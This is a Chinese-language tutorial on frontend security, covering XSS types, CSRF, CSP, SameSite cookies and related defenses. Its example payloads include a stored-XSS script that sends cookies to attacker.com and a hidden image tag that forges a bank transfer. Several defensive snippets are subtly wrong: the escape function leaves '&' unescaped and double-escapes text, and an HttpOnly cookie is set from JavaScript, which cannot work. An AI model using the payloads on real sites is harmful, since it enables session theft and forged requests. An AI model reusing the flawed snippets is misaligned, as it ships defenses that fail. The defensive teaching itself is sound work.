前端安全：XSS、CSRF 防御与最佳实践

引言

随着互联网应用的普及，前端安全问题日益凸显。作为开发者，了解并防范常见的安全威胁至关重要。本文将深入探讨两种最常见的前端安全威胁：跨站脚本攻击（XSS）和跨站请求伪造（CSRF），并提供实用的防御策略与最佳实践。

一、跨站脚本攻击（XSS）

1.1 什么是XSS？

XSS（Cross-Site Scripting）是一种代码注入攻击，攻击者通过在受信任的网站上注入恶意脚本代码，当用户浏览该页面时，恶意脚本会在用户的浏览器中执行。

1.2 XSS的类型

1.2.1 存储型XSS

恶意代码被存储在目标服务器上（如数据库），当用户请求包含此恶意代码的页面时，代码会被执行。

// 用户输入（存储到数据库）
const userComment = "<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>";

// 服务器直接渲染到页面
document.getElementById('comments').innerHTML = userComment; // 危险操作！

1.2.2 反射型XSS

攻击者将恶意代码嵌入到URL中，当服务器接收到请求后，恶意代码会被"反射"回用户的浏览器执行。

https://example.com/search?q=<script>alert('XSS')</script>

1.2.3 DOM型XSS

完全在客户端执行，恶意代码通过修改DOM环境在本地执行。

// URL: https://example.com/page#<script>alert('XSS')</script>
document.getElementById('output').innerHTML = location.hash.substring(1); // 危险操作！

1.3 XSS防御策略

1.3.1 输入验证与过滤

对用户输入进行严格验证，过滤特殊字符：

// 简单的HTML转义函数
function escapeHTML(str) {
  return str
    .replace(/&/g, '&')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

// 使用
const userInput = "<script>alert('XSS')</script>";
const safeInput = escapeHTML(userInput);
document.getElementById('content').textContent = safeInput; // 更安全的方式

1.3.2 使用安全的API

优先使用不解析HTML的API：

// 不安全
element.innerHTML = userInput;

// 安全
element.textContent = userInput;

1.3.3 内容安全策略（CSP）

通过HTTP头或meta标签配置CSP，限制资源加载和脚本执行：

<!-- 通过meta标签设置CSP -->
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self' https://trusted-cdn.com;">

服务器端设置：

Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted-cdn.com;

1.3.4 使用现代框架

现代前端框架（React、Vue、Angular）默认会对数据进行转义：

// React自动转义
function Comment({ text }) {
  return <div>{text}</div>; // React自动转义text内容
}

<!-- Vue自动转义 -->
<template>
  <div>{{ userInput }}</div> <!-- Vue自动转义 -->
</template>

二、跨站请求伪造（CSRF）

2.1 什么是CSRF？

CSRF（Cross-Site Request Forgery）是一种攻击，强制已认证用户执行非本意的操作，如在不知情的情况下更改账户信息、发送消息等。

2.2 CSRF攻击示例

假设用户已登录银行网站，攻击者可能会诱导用户访问包含以下代码的恶意网站：

<!-- 恶意网站的HTML -->
<img src="https://bank.example.com/transfer?to=attacker&amount=1000" style="display:none">

当用户访问恶意网站时，浏览器会自动发送请求到银行网站，并携带用户的认证Cookie。

2.3 CSRF防御策略

2.3.1 CSRF Token

在表单中嵌入一个随机生成的令牌，服务器验证该令牌：

<form action="/transfer" method="POST">
  <input type="hidden" name="csrf_token" value="random_token_here">
  <!-- 其他表单字段 -->
  <button type="submit">转账</button>
</form>

前端AJAX请求中添加CSRF Token：

// 使用Axios发送请求
axios.defaults.headers.common['X-CSRF-TOKEN'] = document.querySelector('meta[name="csrf-token"]').getAttribute('content');

axios.post('/api/transfer', {
  amount: 1000,
  recipient: 'friend'
});

2.3.2 SameSite Cookie属性

设置Cookie的SameSite属性可以防止跨站请求发送Cookie：

Set-Cookie: sessionid=abc123; SameSite=Strict;

• Strict: 仅在同站点请求时发送Cookie
• Lax: 导航到目标网址的GET请求会发送Cookie（默认值）
• None: 在跨站请求中也会发送Cookie（需要设置Secure属性）

2.3.3 检查Referer和Origin头

服务器可以检查请求的Referer或Origin头，确保请求来自合法来源：

// 服务器端代码示例（Node.js）
app.post('/api/transfer', (req, res) => {
  const referer = req.headers.referer || '';
  const origin = req.headers.origin || '';
  
  if (!referer.startsWith('https://yourwebsite.com') && 
      !origin.startsWith('https://yourwebsite.com')) {
    return res.status(403).json({ error: 'Invalid request source' });
  }
  
  // 处理请求...
});

2.3.4 使用双重提交Cookie

设置一个Cookie，并在请求参数中也提交相同的值：

// 设置Cookie
document.cookie = "csrfCookie=random_token; path=/; SameSite=Strict";

// 发送请求时包含相同的值
fetch('/api/transfer', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'X-CSRF-Token': 'random_token' // 与Cookie值相同
  },
  body: JSON.stringify({ amount: 1000, recipient: 'friend' })
});

三、其他前端安全最佳实践

3.1 HTTPS的使用

始终使用HTTPS协议，防止中间人攻击和数据窃听：

// 检测并重定向到HTTPS
if (location.protocol !== 'https:') {
  location.replace(`https:${location.href.substring(location.protocol.length)}`);
}

3.2 安全的依赖管理

定期更新依赖包，使用工具扫描潜在安全漏洞：

# 使用npm audit检查依赖安全问题
npm audit

# 修复安全问题
npm audit fix

3.3 安全的本地存储使用

敏感信息不应存储在localStorage或sessionStorage中：

// 不安全
localStorage.setItem('authToken', token);

// 更安全（仅在HTTPS下使用Cookie存储）
document.cookie = `authToken=${token}; Secure; HttpOnly; SameSite=Strict`;

3.4 防止点击劫持

使用X-Frame-Options或CSP frame-ancestors防止网站被嵌入到iframe中：

X-Frame-Options: DENY

或在前端实现防护：

// 如果页面被嵌入iframe，强制跳出
if (window !== window.top) {
  window.top.location = window.location;
}

3.5 子资源完整性（SRI）

使用SRI确保加载的外部资源未被篡改：

<script src="https://cdn.example.com/library.js" 
        integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC" 
        crossorigin="anonymous"></script>

四、安全测试与审计

4.1 自动化安全测试

集成安全测试到CI/CD流程：

# 使用OWASP ZAP进行自动化安全测试
docker run -t owasp/zap2docker-stable zap-baseline.py -t https://yourwebsite.com

4.2 渗透测试

定期进行渗透测试，发现潜在安全漏洞。

4.3 代码审计

进行安全代码审查，特别关注用户输入处理和认证逻辑。

结论

前端安全是一个持续的过程，需要开发者保持警惕并采取多层次的防御策略。通过理解XSS和CSRF等常见攻击方式，并实施本文提到的防御措施，可以显著提高应用的安全性。

参考资源

1. OWASP Top Ten
2. Content Security Policy (CSP)
3. SameSite Cookies Explained
4. Subresource Integrity
5. OWASP XSS Prevention Cheat Sheet
6. OWASP CSRF Prevention Cheat Sheet